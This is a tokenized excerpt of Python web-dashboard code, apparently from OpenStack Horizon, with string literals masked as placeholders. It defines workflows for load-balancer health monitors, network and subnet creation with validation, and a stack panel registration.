TextInput ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:type>' , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) ) <EOL> expected_codes = forms . RegexField ( <EOL> initial = "<STR_LIT>" , <EOL> required = False , <EOL> max_length = <NUM_LIT> , <EOL> regex = r'<STR_LIT>' , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:type>' , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) ) <EOL> admin_state_up = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddMonitorAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> def clean ( self ) : <EOL> cleaned_data = super ( AddMonitorAction , self ) . clean ( ) <EOL> type_opt = cleaned_data . get ( '<STR_LIT:type>' ) <EOL> if type_opt in [ '<STR_LIT:http>' , '<STR_LIT>' ] : <EOL> http_method_opt = cleaned_data . get ( '<STR_LIT>' ) <EOL> url_path = cleaned_data . get ( '<STR_LIT>' ) <EOL> expected_codes = cleaned_data . get ( '<STR_LIT>' ) <EOL> if not http_method_opt : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( [ msg ] ) <EOL> if not url_path : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( [ msg ] ) <EOL> if not expected_codes : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = self . 
error_class ( [ msg ] ) <EOL> return cleaned_data <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AddMonitorStep ( workflows . Step ) : <EOL> action_class = AddMonitorAction <EOL> contributes = ( "<STR_LIT:type>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddMonitorStep , self ) . contribute ( data , context ) <EOL> if data : <EOL> return context <EOL> class AddMonitor ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddMonitorStep , ) <EOL> def handle ( self , request , context ) : <EOL> try : <EOL> context [ '<STR_LIT>' ] = api . lbaas . pool_health_monitor_create ( <EOL> request , ** context ) . get ( '<STR_LIT:id>' ) <EOL> return True <EOL> except Exception : <EOL> exceptions . handle ( request , _ ( "<STR_LIT>" ) ) <EOL> return False <EOL> class AddPMAssociationAction ( workflows . Action ) : <EOL> monitor_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddPMAssociationAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> def populate_monitor_id_choices ( self , request , context ) : <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" % context [ '<STR_LIT>' ] ) <EOL> monitor_id_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> try : <EOL> monitors = api . lbaas . pool_health_monitors_get ( request ) <EOL> for m in monitors : <EOL> if m . id not in context [ '<STR_LIT>' ] : <EOL> monitor_id_choices . 
append ( ( m . id , m . id ) ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = monitor_id_choices <EOL> return monitor_id_choices <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" ) <EOL> class AddPMAssociationStep ( workflows . Step ) : <EOL> action_class = AddPMAssociationAction <EOL> depends_on = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> contributes = ( "<STR_LIT>" , ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddPMAssociationStep , self ) . contribute ( data , context ) <EOL> if data : <EOL> return context <EOL> class AddPMAssociation ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddPMAssociationStep , ) <EOL> def handle ( self , request , context ) : <EOL> try : <EOL> context [ '<STR_LIT>' ] = api . lbaas . pool_monitor_association_create ( <EOL> request , ** context ) <EOL> return True <EOL> except Exception : <EOL> exceptions . handle ( request , _ ( "<STR_LIT>" ) ) <EOL> return False <EOL> class DeletePMAssociationAction ( workflows . Action ) : <EOL> monitor_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( DeletePMAssociationAction , self ) . __init__ ( <EOL> request , * args , ** kwargs ) <EOL> def populate_monitor_id_choices ( self , request , context ) : <EOL> self . fields [ '<STR_LIT>' ] . label = ( _ ( "<STR_LIT>" ) % <EOL> context [ '<STR_LIT>' ] ) <EOL> monitor_id_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> try : <EOL> for m_id in context [ '<STR_LIT>' ] : <EOL> monitor_id_choices . 
append ( ( m_id , m_id ) ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = monitor_id_choices <EOL> return monitor_id_choices <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" ) <EOL> class DeletePMAssociationStep ( workflows . Step ) : <EOL> action_class = DeletePMAssociationAction <EOL> depends_on = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> contributes = ( "<STR_LIT>" , ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( DeletePMAssociationStep , self ) . contribute ( <EOL> data , context ) <EOL> if data : <EOL> return context <EOL> class DeletePMAssociation ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( DeletePMAssociationStep , ) <EOL> def handle ( self , request , context ) : <EOL> try : <EOL> context [ '<STR_LIT>' ] = api . lbaas . pool_monitor_association_delete ( <EOL> request , ** context ) <EOL> return True <EOL> except Exception : <EOL> exceptions . handle ( request , _ ( "<STR_LIT>" ) ) <EOL> return False </s>
<s> import logging <EOL> import netaddr <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import messages <EOL> from horizon . utils import fields <EOL> from horizon import workflows <EOL> from openstack_dashboard import api <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class CreateNetworkInfoAction ( workflows . Action ) : <EOL> net_name = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False ) <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> net_profile_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> admin_state = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( CreateNetworkInfoAction , self ) . __init__ ( request , <EOL> * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . choices = ( <EOL> self . get_network_profile_choices ( request ) ) <EOL> def get_network_profile_choices ( self , request ) : <EOL> profile_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> for profile in self . _get_profiles ( request , '<STR_LIT>' ) : <EOL> profile_choices . append ( ( profile . id , profile . name ) ) <EOL> return profile_choices <EOL> def _get_profiles ( self , request , type_p ) : <EOL> try : <EOL> profiles = api . neutron . profile_list ( request , type_p ) <EOL> except Exception : <EOL> profiles = [ ] <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( request , msg ) <EOL> return profiles <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class CreateNetworkInfo ( workflows . Step ) : <EOL> action_class = CreateNetworkInfoAction <EOL> if api . neutron . 
is_port_profiles_supported ( ) : <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> class CreateSubnetInfoAction ( workflows . Action ) : <EOL> with_subnet = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> subnet_name = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False ) <EOL> cidr = fields . IPField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> initial = "<STR_LIT>" , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> version = fields . IPv4 | fields . IPv6 , <EOL> mask = True ) <EOL> ip_version = forms . ChoiceField ( choices = [ ( <NUM_LIT:4> , '<STR_LIT>' ) , ( <NUM_LIT:6> , '<STR_LIT>' ) ] , <EOL> label = _ ( "<STR_LIT>" ) ) <EOL> gateway_ip = fields . IPField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> initial = "<STR_LIT>" , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> version = fields . IPv4 | fields . IPv6 , <EOL> mask = False ) <EOL> no_gateway = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = False , required = False ) <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> help_text = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _check_subnet_data ( self , cleaned_data , is_create = True ) : <EOL> cidr = cleaned_data . get ( '<STR_LIT>' ) <EOL> ip_version = int ( cleaned_data . get ( '<STR_LIT>' ) ) <EOL> gateway_ip = cleaned_data . get ( '<STR_LIT>' ) <EOL> no_gateway = cleaned_data . get ( '<STR_LIT>' ) <EOL> if not cidr : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise forms . ValidationError ( msg ) <EOL> if cidr : <EOL> subnet = netaddr . IPNetwork ( cidr ) <EOL> if subnet . 
version != ip_version : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise forms . ValidationError ( msg ) <EOL> if ( ip_version == <NUM_LIT:4> and subnet . prefixlen == <NUM_LIT:32> ) or ( ip_version == <NUM_LIT:6> and subnet . prefixlen == <NUM_LIT> ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> % subnet . prefixlen ) <EOL> raise forms . ValidationError ( msg ) <EOL> if not no_gateway and gateway_ip : <EOL> if netaddr . IPAddress ( gateway_ip ) . version is not ip_version : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise forms . ValidationError ( msg ) <EOL> if not is_create and not no_gateway and not gateway_ip : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise forms . ValidationError ( msg ) <EOL> def clean ( self ) : <EOL> cleaned_data = super ( CreateSubnetInfoAction , self ) . clean ( ) <EOL> with_subnet = cleaned_data . get ( '<STR_LIT>' ) <EOL> if not with_subnet : <EOL> return cleaned_data <EOL> self . _check_subnet_data ( cleaned_data ) <EOL> return cleaned_data <EOL> class CreateSubnetInfo ( workflows . Step ) : <EOL> action_class = CreateSubnetInfoAction <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class CreateSubnetDetailAction ( workflows . Action ) : <EOL> enable_dhcp = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> allocation_pools = forms . CharField ( <EOL> widget = forms . Textarea ( ) , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> required = False ) <EOL> dns_nameservers = forms . CharField ( <EOL> widget = forms . widgets . Textarea ( ) , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> required = False ) <EOL> host_routes = forms . CharField ( <EOL> widget = forms . widgets . 
Textarea ( ) , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> required = False ) <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> help_text = _ ( '<STR_LIT>' ) <EOL> def _convert_ip_address ( self , ip , field_name ) : <EOL> try : <EOL> return netaddr . IPAddress ( ip ) <EOL> except ( netaddr . AddrFormatError , ValueError ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' % dict ( <EOL> field_name = field_name , ip = ip ) ) <EOL> raise forms . ValidationError ( msg ) <EOL> def _convert_ip_network ( self , network , field_name ) : <EOL> try : <EOL> return netaddr . IPNetwork ( network ) <EOL> except ( netaddr . AddrFormatError , ValueError ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' % dict ( <EOL> field_name = field_name , network = network ) ) <EOL> raise forms . ValidationError ( msg ) <EOL> def _check_allocation_pools ( self , allocation_pools ) : <EOL> for p in allocation_pools . split ( '<STR_LIT:\n>' ) : <EOL> p = p . strip ( ) <EOL> if not p : <EOL> continue <EOL> pool = p . split ( '<STR_LIT:U+002C>' ) <EOL> if len ( pool ) != <NUM_LIT:2> : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % p <EOL> raise forms . ValidationError ( msg ) <EOL> start , end = [ self . _convert_ip_address ( ip , "<STR_LIT>" ) <EOL> for ip in pool ] <EOL> if start > end : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % p <EOL> raise forms . ValidationError ( msg ) <EOL> def _check_dns_nameservers ( self , dns_nameservers ) : <EOL> for ns in dns_nameservers . split ( '<STR_LIT:\n>' ) : <EOL> ns = ns . strip ( ) <EOL> if not ns : <EOL> continue <EOL> self . _convert_ip_address ( ns , "<STR_LIT>" ) <EOL> def _check_host_routes ( self , host_routes ) : <EOL> for r in host_routes . split ( '<STR_LIT:\n>' ) : <EOL> r = r . strip ( ) <EOL> if not r : <EOL> continue <EOL> route = r . 
split ( '<STR_LIT:U+002C>' ) <EOL> if len ( route ) != <NUM_LIT:2> : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % r <EOL> raise forms . ValidationError ( msg ) <EOL> self . _convert_ip_network ( route [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . _convert_ip_address ( route [ <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> def clean ( self ) : <EOL> cleaned_data = super ( CreateSubnetDetailAction , self ) . clean ( ) <EOL> self . _check_allocation_pools ( cleaned_data . get ( '<STR_LIT>' ) ) <EOL> self . _check_host_routes ( cleaned_data . get ( '<STR_LIT>' ) ) <EOL> self . _check_dns_nameservers ( cleaned_data . get ( '<STR_LIT>' ) ) <EOL> return cleaned_data <EOL> class CreateSubnetDetail ( workflows . Step ) : <EOL> action_class = CreateSubnetDetailAction <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> class CreateNetwork ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> default_steps = ( CreateNetworkInfo , <EOL> CreateSubnetInfo , <EOL> CreateSubnetDetail ) <EOL> def get_success_url ( self ) : <EOL> return reverse ( "<STR_LIT>" ) <EOL> def get_failure_url ( self ) : <EOL> return reverse ( "<STR_LIT>" ) <EOL> def format_status_message ( self , message ) : <EOL> name = self . context . get ( '<STR_LIT>' ) or self . context . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return message % name <EOL> def _create_network ( self , request , data ) : <EOL> try : <EOL> params = { '<STR_LIT:name>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] } <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> params [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> network = api . neutron . network_create ( request , ** params ) <EOL> network . set_id_as_name_if_empty ( ) <EOL> self . context [ '<STR_LIT>' ] = network . 
id <EOL> msg = _ ( '<STR_LIT>' ) % network . name <EOL> LOG . debug ( msg ) <EOL> return network <EOL> except Exception as e : <EOL> msg = ( _ ( '<STR_LIT>' ) % <EOL> { "<STR_LIT>" : data [ '<STR_LIT>' ] , "<STR_LIT>" : e } ) <EOL> LOG . info ( msg ) <EOL> redirect = self . get_failure_url ( ) <EOL> exceptions . handle ( request , msg , redirect = redirect ) <EOL> return False <EOL> def _setup_subnet_parameters ( self , params , data , is_create = True ) : <EOL> """<STR_LIT>""" <EOL> is_update = not is_create <EOL> params [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> if is_create and data [ '<STR_LIT>' ] : <EOL> pools = [ dict ( zip ( [ '<STR_LIT:start>' , '<STR_LIT:end>' ] , pool . strip ( ) . split ( '<STR_LIT:U+002C>' ) ) ) <EOL> for pool in data [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> if pool . strip ( ) ] <EOL> params [ '<STR_LIT>' ] = pools <EOL> if data [ '<STR_LIT>' ] or is_update : <EOL> routes = [ dict ( zip ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> route . strip ( ) . split ( '<STR_LIT:U+002C>' ) ) ) <EOL> for route in data [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> if route . strip ( ) ] <EOL> params [ '<STR_LIT>' ] = routes <EOL> if data [ '<STR_LIT>' ] or is_update : <EOL> nameservers = [ ns . strip ( ) <EOL> for ns in data [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> if ns . strip ( ) ] <EOL> params [ '<STR_LIT>' ] = nameservers <EOL> def _create_subnet ( self , request , data , network = None , tenant_id = None , <EOL> no_redirect = False ) : <EOL> if network : <EOL> network_id = network . id <EOL> network_name = network . name <EOL> else : <EOL> network_id = self . context . get ( '<STR_LIT>' ) <EOL> network_name = self . context . 
get ( '<STR_LIT>' ) <EOL> try : <EOL> params = { '<STR_LIT>' : network_id , <EOL> '<STR_LIT:name>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : int ( data [ '<STR_LIT>' ] ) } <EOL> if tenant_id : <EOL> params [ '<STR_LIT>' ] = tenant_id <EOL> if data [ '<STR_LIT>' ] : <EOL> params [ '<STR_LIT>' ] = None <EOL> elif data [ '<STR_LIT>' ] : <EOL> params [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> self . _setup_subnet_parameters ( params , data ) <EOL> subnet = api . neutron . subnet_create ( request , ** params ) <EOL> self . context [ '<STR_LIT>' ] = subnet . id <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT>' ] <EOL> LOG . debug ( msg ) <EOL> return subnet <EOL> except Exception as e : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if no_redirect : <EOL> redirect = None <EOL> else : <EOL> redirect = self . get_failure_url ( ) <EOL> exceptions . handle ( request , <EOL> msg % { "<STR_LIT>" : data [ '<STR_LIT>' ] , "<STR_LIT>" : network_name , <EOL> "<STR_LIT>" : e } , <EOL> redirect = redirect ) <EOL> return False <EOL> def _delete_network ( self , request , network ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> api . neutron . network_delete ( request , network . id ) <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % network . name <EOL> LOG . debug ( msg ) <EOL> redirect = self . get_failure_url ( ) <EOL> messages . info ( request , msg ) <EOL> raise exceptions . Http302 ( redirect ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) % network . name <EOL> LOG . info ( msg ) <EOL> redirect = self . get_failure_url ( ) <EOL> exceptions . handle ( request , msg , redirect = redirect ) <EOL> def handle ( self , request , data ) : <EOL> network = self . _create_network ( request , data ) <EOL> if not network : <EOL> return False <EOL> if not data [ '<STR_LIT>' ] : <EOL> return True <EOL> subnet = self . 
_create_subnet ( request , data , network , no_redirect = True ) <EOL> if subnet : <EOL> return True <EOL> else : <EOL> self . _delete_network ( request , network ) <EOL> return False </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> import horizon <EOL> from openstack_dashboard . dashboards . project import dashboard <EOL> class Stacks ( horizon . Panel ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> permissions = ( '<STR_LIT>' , ) <EOL> dashboard . Project . register ( Stacks ) </s>
